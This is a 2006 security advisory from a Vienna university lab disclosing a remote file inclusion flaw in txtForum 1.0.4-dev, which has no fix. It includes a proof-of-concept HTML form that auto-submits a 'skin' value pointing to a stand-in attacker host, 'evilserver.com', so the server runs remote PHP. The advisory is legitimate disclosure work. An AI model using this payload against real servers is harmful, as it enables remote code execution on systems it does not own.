txtForum: Script Injection Vulnerability
===========================================================
txtForum: Script Injection Vulnerability
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0603-004, March 9, 2006
===========================================================
Affected applications
----------------------
txtForum (http://sourceforge.net/projects/txtforum1)
Versions 1.0.4-dev and prior.
Description
------------
There is an include statement in the file common.php on line 46 that makes use
of the SKIN constant, which was previously defined via the $skin variable.
Under the following conditions, an attacker can inject arbitrary PHP script
into the application:
- register_globals has to be active
- remote file inclusions have to be allowed
All the attacker has to do is find a path through the program that doesn't
initialize the $skin variable. The attacker does not require access to an
account in the forum. Here is an example for an attack page:
<form action='http://localhost/txtforum104/login.php' method="post">
<input type="text" name="login_username" value="admin"/>
<input type="text" name="login_password" value="xyz"/>
<input type="text" name="skin" value="http://evilserver.com"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
This leads to execution of the code in http://evilserver.com/header.tpl. There
might be further possibilities for exploits (similar include statements can
also be found on lines 53 and 61).
Solution
---------
There is no solution to this issue yet.
Timeline:
March 2, 2006:
Vulnerability reported to and acknowledged by the developer (I.Konforti).
A fix is not planned.
March 9, 2006:
Advisory submission.
References
-----------
http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-004.txt
Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at